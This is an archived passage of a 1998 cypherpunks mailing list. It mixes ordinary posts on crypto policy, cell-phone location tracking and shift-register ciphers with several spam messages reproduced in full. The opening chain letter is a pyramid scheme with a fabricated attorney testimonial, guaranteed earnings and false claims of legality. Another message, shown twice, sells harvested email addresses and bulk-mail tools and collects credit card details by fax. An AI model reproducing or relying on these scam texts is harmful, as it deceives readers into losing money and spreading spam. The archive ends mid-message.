</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3>
</PRE></HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdshea@12291.com
Date: Sun, 8 Mar 1998 05:02:51 -0800 (PST)
To: Friend@public.com
Subject: This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



This is your NEW HOUSE,  or BOAT, or ROLLS ROYCE
THIS CAN BE YOUR BEST OF DREAMS......TRY IT!



THIS MAY BE THE MOST SIGNIFICANT LETTER 
                                      YOU WILL RECEIVE THIS YEAR!!
-----------------------------------------------------------------------
***Please,... Follow The Instructions Of This  Letter Very Carefully.       Immediately Make  A Copy,  And Read It Twice.*** 

Subject: It's Only a Game, But You Win Big Money!

Greetings, 

Hopefully my name is still on the list below. I am a retired
attorney, and about two years ago a man came to me with a letter. The
letter he brought me is basically the same as the letter in front of you
now. He asked me to verify the fact that this letter was legal. I told him
that I would review it and get back to him. When I first read the letter I
thought it was some off-the-wall idea to make money. A week later I
met again with my client to discuss the issue. I told him that the letter 
originally brought to me was not 100% legal. My client asked me to
alter the letter to make it 100% legal. I advised him to make a small 
change in the letter and it would be alright.
I was curious about the letter, so he told me how it works. I thought it
was a long shot, so I decided against participating. Before my client
left, I asked him to keep me updated as to his results. About two 
months later he called to tell me that he had received over $800,000
in cash! I didn't believe him so he asked me to try the plan and see 
for myself. I thought about it for a couple of days and decided that 
there was not much to lose. I followed the instructions exactly and 
mailed out 200 letters. Sure enough, the money started coming! 
It came slowly at first, but after three weeks I was getting more 
than I could open in a day. After about three months the money 
stopped coming. I kept a precise record of my earnings and at the
end it totaled $868,439.00.

I was earning a good living as a lawyer, but as anyone in the legal
profession will tell you, there is a lot of stress that comes with the
job. I told myself if things worked out I would retire from practice and
play golf. I decided to try the letter again, but this time I sent 500
letters out. Well, three months later I had totaled $2,344,178.00!!! I
just couldn't believe it. I met my old client for lunch to find out how
this exactly works. He told me that there were a few similar letters 
going around. What made this one different is the fact that there are
six names on the letter, not five like most others. That fact alone
resulted in far more returns. The other factor was the advice I gave
him in making sure the whole thing was perfectly legal, since no one
wants to risk doing anything illegal.
                               
I bet by now you are curious about what little change I told him to
make. Well, if you send a letter like this out, to be legal, you must sell
something if you expect to receive a dollar. I told him that anyone
sending a dollar out must receive something in return. So when you 
send a dollar to each of the six names on the list, you must include a 
slip of paper saying, "Please put me on your mailing list" and include 
your name, mailing address, and email address. (Your phone # is optional).
This is the key to the program! The item you will receive for a dollar you 
send to the six names below, is this letter and the right to earn thousands. 
We will be working together to improve each others lives!

Follow the simple instructions below exactly, and in less than three
months you will receive over $800,000.00 GUARANTEED!!!!!!

A)  Immediately send $1.00 to each of the six people on the list below.
Wrap the dollar in a note (type written or handwritten) saying
"Please add me to your mailing list" and include your name, 
mailing address, and email address. Your phone number is optional:

1) Anthony Thomas  8150 East Hildale St.  Detroit, MI  48234
2) Claudia Stephan PO Box 1819 Carmichael, CA 95609
3) Anita Volsh PO Box 2408 Fair Oaks, CA 95628
4) Nadia Segun PO Box 1357 Rancho Cordova, CA 95741
5) Lidia Zoring  3500 Data dr. # 147 Rancho Cordova, CA 95670
6) James Thomas 11329 S Peoria St. Chicago, IL 60643


B) Remove the name next to #1 on the list and move the rest of the names
up one position. Then place your name in the #6 spot. This is best done by
typing a new list and taping or gluing it over the old one. Or by saving
this to a text file and editing it yourself and saving the new edited 
copy.

C) When you have completed the above instructions, you have an option
of mailing your new letter out in two ways: 1) Through the U.S. Postal
Service or 2) through e-mail. This letter has been proven perfectly legal
for both ways as long as you follow the above instructions, because you're
purchasing membership in an exclusive mailing list . To mail this 
out over the internet, you can browse through areas and find people to 
send  this to all the time. All you have to do is cut and paste email addresses 
wherever you are on the Internet. Remember, it doesn't cost anything to 
mail on the Internet. Or you can get a Mass Mail Network to mail it
out in large volumes for you.                         

2


One that we recommend is:
Cyber Mail ($15 / 200 names) ($25 / 500 names) ($50 / 1,500 names) 
16500 North Park Dr.
Suite 413
Southfield, MI  48075
(248) 557-7778

Either way will bring big payoffs. If you 
are going to use the traditional U.S. Postal Service to do this program, 
you will want to order a minimum 200 names from a mailing list company. 
Two that have been most effective for these lists are: 

***Be sure to ask for "Opportunity Seekers" and request a list less
      than 30 days old***

S.E. Ring Mailing List ($26 / 200 names)
P.O Box 15061
Ft. Lauderdale, FL 33318 (954) 742-9519

Advon Distributors ($28 / 200 names)
P.O. Box B-11
Shelly, ID 83274 (800) 992-3866

***Keep in mind- there is no limit to the amount of names you can send 
      out.  The more names you send, the more money you'll make.
      We strongly encourage you to mail this letter to family, friends and 
      relatives as well.*** 
     

D) When your mailing list arrives, place one label on a stamped
envelope and drop it in the mail box (Be sure to send out at least 200). 
Within 90 days, you will receive over $800,000. 

E)  Keep a copy of this letter and all the names you receive. Mail it out 
again in about 6 months. But mail it to the addresses you received with 
each dollar. It will work again, only much better.

THIS IS A SERVICE AND IS 100% LEGAL !
(Refer to title 18, Section 1302 & 1342 of the U.S. Postal and Lottery 
Laws)

3                                                           
                                                          

Assume for example you get a 7.5% return rate, which is very conservative.
My first attempt was about 9.5% and my second time was over 11%.

1) When you mail out 200 letters, 15 people will send you $1.00.
2) Those 15 mail out 200 letters, and 225 people will send you $1.00
3) Those 225 mail out 200 letters, and 3,375 people will send you $1.00
4) Those 3,375 mail out 200 letters, and 50,625 people will send you $1.00
5) Those 50,625 mail out 200 letters, and 759,375 people will send you $1.00 

At this point your name drops off the list,
but so far you have received $813,615.00!!!!!

It works every time, but how well depends on how many letters you send
out. In the example above, you mailed out 200 letters, if you mailed out 500
letters, you would have received $2,006,917!! Check the math yourself,
I want you to, but I guarantee it is correct! With this kind of return,
you've got to try it. Try it once and you will do it again!!!

Just make sure you send a dollar to each of the six names on the list with
a note to be added to their mailing list. Together we will all prosper!!!!

PS  You've read this far, so let me ask you one simple question:

Q.                      What do you have to lose??
A.                       Only $ 6.00 

What you can gain is an income, like the example in this letter.
Small Risk, Small Expense, HUGE Potential Return!!!
What do you have to loose?
I invite you to join our mailing list today!!!

Don't throw this away. Keep it, think about it, and in several months you will try it!


I looked at it for over two months and then I said "it's only $6" I have to be nuts not to try it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jo.dfr.567a@msn.com
Date: Sat, 14 Mar 1998 08:55:23 -0800 (PST)
To: sq9.vbc3e5z@msn.com
Subject: 68 Million Email Addresses - $99
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qwlkty89z@xpc.xpoint.co
Date: Wed, 18 Mar 1998 14:37:27 -0800 (PST)
To: kajd3847jclz@www.longnet.com.au
Subject: 68 Million Email Addresses - $99
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


          68 MILLION
 EMAIL ADDRESSES
 FOR ONLY $99 
       

 You want to make some money? 

 I can put you in touch with over 60 million people at virtualy no cost.

 Can you make one cent from each of theses names?

If you can you have a profit of over $600,000.00 

This offer is not for everyone. 

If you can not see the just how excellent the
 risk / reward ratio in this offer is then there is nothing I can do for you. 

To make money you must stop dreaming and TAKE ACTION.


****************************************

PACKAGE  A

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!

$99.00

****************************************

PACKAGE B

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

$ 139.00

****************************************

PACKAGE  C

THE WORKS

68,000,000 email addresses on CD

These name are all in text files

ready to mail!!!       AND

15 Different Bulk email programs 

and tools  to help with your mailings

and list managment.

             AND 

Over 500 diferent Business Reports

now being sold on the internet for up to

$100 each. You get full rights to resell these reports.

With this package you get the email addresses, 

the software to mail them AND ready to sell  information products.

AND ...... 

. a collection of the 100 best money making

adds currently floating around on the internet.

$ 189

****************************************

SEVERAL WAYS TO ORDER !!!

IF YOU ORDER BY PHONE WE WILL SHIP YOUR CD CONTAINING THE 68 MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!

 
  1) WE ACCEPT:  AMERICAN EXPRESS OR
    
                               VISA <> MASTERCARD
 
     TYPE OF CARD  AMX / VISA / MC??_______________

      EXPIRATION DATE   ___________________________
 
     NAME ON CREDIT CARD________________________
 
     CREDIT CARD #________________________________
 
     BILLING ADDRESS ____________________________
 
     CITY_________________________________________
 
    STATE________________ZIP_____________________
 
   PHONE INCLUDE AREA CODE___________________
   
    EMAIL ADDRESS______________________________ 

        WE WILL BILL selected amount to your account plus the following shipping costs

        SHIPPING  COST OF 3.85 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL /  FEDERAL EXPRESS
 
        SALES TAX (7.25%) added to CA residents 
 
  >>> Send correct amount in cash, check or money

order to:

  >>> ELECTRIC EMAIL
  >>> 702 Mangrove Avenue, Suite 151
  >>> Chico, CA 95926


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4291.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!



Electric Email is a private company and is not affiliated with, or endorsed by, AOL, MSN, or any other Internet Service Provider.

Copyright 1998

All rights reserved

Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof, or abridging the freedom of speech 
or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.         
    
Amendment I, The US Constitution                                                                :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thecompanyprez@a-vip.com
Date: Thu, 19 Mar 1998 23:38:31 -0800 (PST)
To: Friend@public.com
Subject: 9 out of 10 Americans are owed an average of $1,200.00 each!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


There is over 400 BILLION DOLLARS in unclaimed and 
lost money in North America and we want to help people 
get their money back! 

In a continuing effort to inform the public of this money, 
Personal Funds Recovery, Inc. is launching an INFOMERCIAL
to air across North America. This INFOMERCIAL will educate millions 
of viewers about the over 400 BILLION DOLLARS that needs to be 
returned to it's rightful owners.
 
We are looking for 300 INDEPENDENT AGENTS who will become 
a part of this campaign. Each Agent will own an exclusive territory 
and will receive a percentage of every lead generated from the national 
informercial!  Your involvement will be very financially rewarding.  

Visit our website at <A HREF="http://www.link2web.net/owedmoney/money.html"</A> 
to find out more about the opportunity and how you can get involved.



********************************
If you wish to be removed
please hit REPLY
and type REMOVE in the
subject line and your 
request will be honored
immediately.
********************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thecompanyprez@a-vip.com
Date: Mon, 23 Mar 1998 20:09:17 -0800 (PST)
To: Friend@public.com
Subject: 9 out of 10 Americans are owed an average of $1,200.00 each!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


There is over 400 BILLION DOLLARS in unclaimed and 
lost money in North America and we want to help people 
get their money back! 

In a continuing effort to inform the public of this money, 
Personal Funds Recovery, Inc. is launching an INFOMERCIAL
to air across North America. This INFOMERCIAL will educate millions 
of viewers about the over 400 BILLION DOLLARS that needs to be 
returned to it's rightful owners.
 
We are looking for 300 INDEPENDENT AGENTS who will become 
a part of this campaign. Each Agent will own an exclusive territory 
and will receive a percentage of every lead generated from the national 
informercial!  Your involvement will be very financially rewarding.  

Visit our website at <A HREF="http://www.link2web.net/owedmoney/money.html"</A> 
to find out more about the opportunity and how you can get involved.



********************************
If you wish to be removed
please hit REPLY
and type REMOVE in the
subject line and your 
request will be honored
immediately.
********************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Fri, 20 Mar 1998 22:26:16 -0800 (PST)
To: youanfme@aol.com
Subject: Cold Drinks Taste Better!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



Cold Drinks Taste Better!  (You gotta see this)
 CLICK HERE NOW!!  


CoolBird keeps your favorite beverage COLD for HOURS.  Make your last sip your coldest with CoolBird!

**Perfect for --Birthdays
                  --Father's Day
                  --picnics
                  --BBQ's
                  --Bosses
                  --Lunches
                  --Trips
                  --Work
Great for anywhere and anytime!!!!
 CLICK HERE NOW!!   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adcp545@juno.com
Date: Sun, 22 Mar 1998 16:11:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: ------->DEBT CONSOLIDATION LOAN PROGRAM <--------
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Dear cypherpunks@toad.com,

   Debt Consolidation Loan Program

   Consolidate all your unsecured debts into one low monthly payment regardless of past credit. In most cases your monthly bills can be cut by as much as 50%. There is no credit check needed and no need to own your own home. Consolidate all those high interest accounts and save......

   Must have more than $1,000 in debt to consolidate. For complete information on our financial services HIT REPLY.

or send S.A.S.E. and email address to:

Internet Financial Services, Inc.
P.O. Box 1665
Peoria, IL. 61656

***FREE $10.00 CALLING CARD SENT TO EVERYBODY THAT REQUESTS MORE INFORMATION AND VISITS OUR WEB SITE.


----------------------- Headers --------------------------------
Return-Path: <IFServices1@juno.com>
Received: from  relay16.mx.aol.com (relay16.mail.aol.com [172.31.106.72]) by air08.mail.aol.com (v40.9) with SMTP; Thu, 19 Mar 1998 09:06:40 -0500
Received: from mx.b.juno.com (ns1.kicon.com [207.199.114.2])
	  by relay16.mx.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id JAA27947;
	  Fri, 20 Mar 1998 09:06:23 -0500 (EST)
From: majordomo@hk.super.net
Received: from ns1.kicon.com by kicon.com (SMI-8.6/SMI-SVR4)
	id FAA14931; Fri, 20 Mar 1998 05:57:26 -0800
Received: from mailhost.marketitz.com(8.8.5/marketitz.2.143) by mailhost.marketitz.com (8.8.5/8.6.5) with SMTP id GAA04111 for <creditservices@clients.com>; Fri, 20 Mar 1998 09:01:04 -0600 (EST)
Date: Fri, 20 Mar 98 09:01:04 EST
To: profit@marketitz.com
Subject: Debt Consolidation Loans Program
Message-ID: <<57988360128 HGI@marketitz.com>>
X-PMFLAGS: 48663992 9
X-UIDL: 48773727mm65reod 4 v 33b
Comments: Authenticated sender is <IFServices1@juno.com>



<FONT  COLOR="#8080ff" SIZE=6>
</FONT><FONT  COLOR="#000000" SIZE=3></B>
<FONT  COLOR="#fffffe" BACK="#fffffe" SIZE=3





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt1@snowhill.com (Al Thompson)
Date: Wed, 1 Apr 1998 14:25:12 +0800
To: Frederick Burroughs <cypherpunks@ns.minder.net>
Subject: Re: Reno and Freeh talking about Crypto and "Terrorism"
Message-ID: <199804010619.AAA02675@frost.snowhill.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:45 PM 3/31/98 -0500, Frederick Burroughs wrote:
>Obviously the Justice Dept. requires a few big busts involving crypto.
>The case should be one in which the perpetrators attempt to cover their
>misdeeds behind strong crypto. An informant will be needed to allow
>"plausible deniability". That is, Justice will say, "If not for the
>informant, we would have never been able to access the encrypted
>evidence.  We can't depend on informants, we need better access." The
>crime should resonate abhorrent  with the public, child prostitution
>ring, illegal dumping of hazardous waste, securities fraud against
>retirees, something that will generate a lot of letters to Congress. In
>the light of these pending realities, Congress will be all too willing
>to give out keys to the backdoor.
  
Don't forget the more obvious: an "impending terrorist attack by crazed gun 
owners who are outraged by reasonable restrictions on firearms."
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Mon, 6 Apr 1998 02:33:55 +0800
To: cypherpunks@toad.com
Subject: What's up in SASEBO, or Don't Tug The Beard
Message-ID: <3.0.5.32.19980405112845.007c1990@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




>From: "George Martin" <gmartin@usonet.ne.jp>
>To: "honig@otc.net" <honig@otc.net>
>Date: Sat, 04 Apr 98 22:25:07 +0900
>Reply-To: "George D. Martin" <gmartin@usonet.ne.jp>
>Priority: Normal
>X-Mailer: PMMail 1.95a For OS/2
>Subject: 
>
>>4)From: David Honig <honig@otc.net>
>>Subject: Illegal export of pgp.zip by .mil
>	
>>http://braggbbs.bragg.army.mil/libs/utils.htm
>>has a link to ftp://bbs.bragg.army.mil/library/utils/pgp262.zip
>
>>Someone (from Europe, ideally) should clue these people
>>in.  Maybe cc the media.  
>
>Maybe you should've checked out the url to see if it was
>valid before you shot your mouth off in public... The file
>was removed quite a few months ago and was never download
>by anyone outside of the .mil domain.  Take your
>troublemaking somewhere else.

I of course informed him that he was mininformed or uninformed.


honig@alum.mit.edu
------------------
"Are we going after their tax returns?  I can only hope that we are,
frankly, doing a little persecuting" ---Nixon to Erlichman,
on tax audits of wealthy Jewish contributors to the Democrats.
	-LA Times 1.4.98





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Tue, 14 Apr 1998 17:59:58 +0800
To: cypherpunks@cyberpass.net
Subject: Fortify for Nestcape Communicator v4.05
Message-ID: <35236BB3.14449BF0@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain



Greetings,

Does anyone know where I could find Fortify for Netscape Communicator
v4.05? I've been to www.fortify.net and that didn't work.

Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Mon, 20 Apr 1998 04:00:59 +0800
To: ichudov@Algebra.COM (Igor Chudov @ home)
Subject: Re: April 26 column -- Swiss militia
In-Reply-To: <3.0.3.32.19980418122207.02f35a30@popd.netcruiser>
Message-ID: <3.0.3.32.19980418143227.006cdde0@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 03:36 PM 4/18/98 -0500, Igor Chudov @ home wrote:

[snip]

>My impression was that, aside from guns, Switzerland is not such a free
>country, with myriads of local laws restricting every fathomable activity.

I have never been to Switzerland.

>> ObGunStuffPlug:
>> I just got a catalog from Cheaper Than Dirt!, which has an impressive
array
>> of gun accessories, ammo, and survival equipment for excellent prices. 
A
>> few examples:
>> 
>> Bushnell 4-12x40 scope			$59.97	I love mine!
>
>They are used, actually, but very good.

You are correct on both counts, although the only way I could tell mine
wasn't new was a couple of nicks in the adjustment screw caps.  My MAK-90
looks much more impressive now...
-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNTkb6cJF0kXqpw3MEQIc8gCeJaNL5T18Fclh2B4NAQRE699t9WUAoNYn
xHz8Mzs6PGPgq6HFjdFgvzHM
=hLlN
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

Proud to be a charter member of the vast right-wing conspiracy!

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@homer.ka9q.ampr.org>
Date: Mon, 27 Apr 1998 16:25:35 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <m0yS81f-004OHCC@homer.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text



>Regardless of the type of phone, the cell stations can be designed to do
>time-of-arrival comparisons on the signal transmitted from the phone and
>calculate a reasonably accurate position.  If you don't want your location
>known, don't transmit.

Ultimately, this is true. But there's still a practical difference
between having to do it with a labor-intensive manual process like
"foxhunting" and making it automatic and routine on a large scale.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 6 May 1998 04:17:16 +0800
To: Cypherpunks Lite <cp-lite@modmult.starium.com>
Subject: SHIFT REGISTER technology
Message-ID: <199805051757.KAA23788@modmult.starium.com>
MIME-Version: 1.0
Content-Type: text/plain



Friday 4/24/98 7:33 AM

John Young
J Orlin Grabbe
John Gilmore

The stuff on linear and non-linear shift register sequences which is now
appearing on jya.com is the 'military-grade' crypto technology.

Semionoff and http://www.jya.com/crack-a5.htm contains material similar
to 
what I saw Brian Snow present in schematics of NSA KG units.

The statement by david.loos@eudoramail.com

  The A5 algorithm uses a three level, non-linear feedback shift
  register arrangement, designed to be sufficiently complex to resist
  attack.

points to the technology used for military-grade crypto.

The reason NSA regarded the R register, seen at
http://jya.com/whpfiles.htm,
feedback function classified was that it contained a non-linear feedback
function.  

I was ORDERED to build UNCLASSIFIED hardware.  This is why I stuck the R
register
feedback function in a fast ram.

This similarity between the structure of the nonlinear feedback function
in the 
CAVE algorithm seen at 

  http://www.semionoff.com/cellular/hacking/phreaking/

to the feedback function published in my SAND report

: A11   A1 A5 AND
        A1 0= A9 0= AND XOR
        A6 A10 XOR XOR ;

reveals  "military-strength" technology.  

SHIFT REGISTERS.

Words 'shift registers' also caused the Great American Spy Sting bust.

        http://caq.com/CAQ/caq63/caq63madsen.html


The Cold War is over.  And the crypto cat is now about fully out of the
bag.

Let's hope for settlement so that we can all go on to more constructive
tasks.

Later
bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Mar 1998 16:39:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Political Test
Message-ID: <199804010039.CAA10566@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


THE SACREDBULL BASIC ENGLISH AND MATH TEST FOR FEDERAL POLITICIANS

SECTION I: Competency in English

1. The phrase, "Congress shall make no law..." means
a. Congress shall make no law...
b. Congress shall make some laws...
c. Americans can do anything they want, except things my colleagues and I,
or our largest contributors, personally dislike.
d. Congress can do anything it damn well pleases, starting with stacking the
courts with our toadies.

2. What is the correct interpretation of the phrase "...the right of the
people...shall not be infringed"?
a. The right of the people...shall not be infringed.
b. The right of the people...shall be infringed, but only gradually,
moderately and for the good of children and battered women (except the ones
we batter).
c. The right of the people is actually a state's right and the states are a
bunch of wusses who'll put up with anything as long as we offer them enough
tax-funded loot in return for selling out their citizens.
d. The people are all sitting on their butts watching TV, so we can infringe
any damn thing we feel like infringing, and we'll get the media to screw you
if you think otherwise.

3. What is the meaning of the phrase, "The powers ... are reserved to the
states, or to the people..."
a. The powers...are reserved to the states, or to the people...
b. The interstate commerce clause gives us the authority to do anything.
Therefore there are no other powers left to reserve for those other twits.
Too bad for them.
c. Where'd you get a stupid idea like that? We're more powerful and have
bigger guns than they do, and that's all that really matters, isn't it?
d. Hahahahahahahahahaha!

4. Essay Question: Write a bill (a proposed law, you twit) in plain English,
for once. We just want to see if you can do it. Extra credit if it's
constitutional or can be read and understood in less than ten minutes by a
high school student of average intelligence.

SECTION II: Competency in Mathematics

1. A fugitive oil baron named Roger gives $300,000 to the Democratic
National Committee for the specific purpose of gaining "access" to the
president. For that, he is given six invitations to the White House, but
does not get the pipeline he wanted. How much money should Roger give to the
DNC next time?
a. Nothing. People shouldn't be able to bribe their way into the presence of
public officials.
b. This is a trick question. Next time, a Republican president might be in
office, and Roger should give his money to the RNC, instead.
c. I know the president. If Roger gives me the money, I'll give Roger
access. Heck, I'll even throw in some hot babes, since Roger said the babes
at the White House were too busy stroking Clinton to pay any attention to
him.
d. $600,000. (Roger's answer, in testimony before Congress 9/18/97.)

2. According to the administration's own projections, Americans will soon
face an 82 percent income tax rate if present entitlement programs and
levels of federal growth persist. How many years before American citizens
rise up in rebellion?
a. Americans should never be driven to that kind of desperation. We should
immediately begin rolling the federal government back to constitutional
levels.
b. Don't worry, we're going to reform the tax system and, as Rep. Mitch
McConnell says, "virtually abolish the IRS as we know it"; we'll just have
an 82 percent national sales tax, instead.
c. As soon as my term in office is over and I can get an oceanside place in
Costa Rica, complete with Uzi-toting bodyguards.
d. What do we care? We'll just let Janet burn the little jerks and claim
they committed suicide.

3. The federal budget is...oh...some great big figure in the gazillions. The
national debt is probably about five trillion dollars, give or take. The
annual deficit is, you know, billions and billions and billions (not
counting off-budget stuff like Amtrak and the Post Office). Budgets for
Social Security and Medicare are increasing at some really wowie-zow of a
percent every year. (Not like you care what the actual figures are, anyway.)
Congress and the president have just cooked up a tax cut package filled with
goodies for favored special interests. Please explain how you can claim the
budget will be balanced by 2002.
a. We can't do it without extreme cutbacks in government. Anybody who says
we can is lying like a congressman.
b. Revenues will...uh...yeah...revenues will increase because of all those
tax breaks and...uh...the economy will be just perfect forever and ever
and...uh...maybe some plague or something will come along and kill off all
those money-sucking old folks...or something like that, maybe.
c. The media said it's true, didn't they? What more proof do you want?
d. Hey, that's for the suckers who are here in 2002 to figure out. I'll be
in Costa Rica by then.
e. Well, actually, now that I think about it, I'll be in some other country
with an army so they can fight off the U.S. troops who will be sent to take
my loot like they did Noriega's. Like, hey, I stole mine fair and square!

Correct answers: B, C, D and E (From the politicians' point of view, that
is. Hey, you know, whatever we can get away with while the folks are
watching TV...)

Correct answer, in reality: L-E-A-D T-H-E-R-A-P-Y


----------------------------------------------------------------------------
----
----- (c) 1997 Charles Curley and Claire Wolfe. Permission to reprint freely
granted
----------------------------------------------------------------------------
----


Return to Index to Writings of Claire Wolfe

Return to Liberty Activist






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Mar 1998 21:33:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: many most important point
Message-ID: <199804010533.HAA17912@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



What are many most important point
upon develop encryption software?

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Mar 1998 21:35:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: many most important point2
Message-ID: <199804010534.HAA18141@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



What are many most important point
upon design block cypher algorithm?


        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Mar 1998 21:38:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: secure design of key schedle
Message-ID: <199804010538.HAA18903@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Show me secure design of key schedle.

        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Mar 1998 22:05:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fwd: PRESS RELEASE - Internet Security Issue
Message-ID: <199804010605.IAA23463@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


-----Original Message-----
From: Mark Hedges <hedges@infonex.com>


>Veil.net is not a strong anonymity provider, they're a trusted third party
>using a slightly hacked popmail and sendmail server. They say "since we do
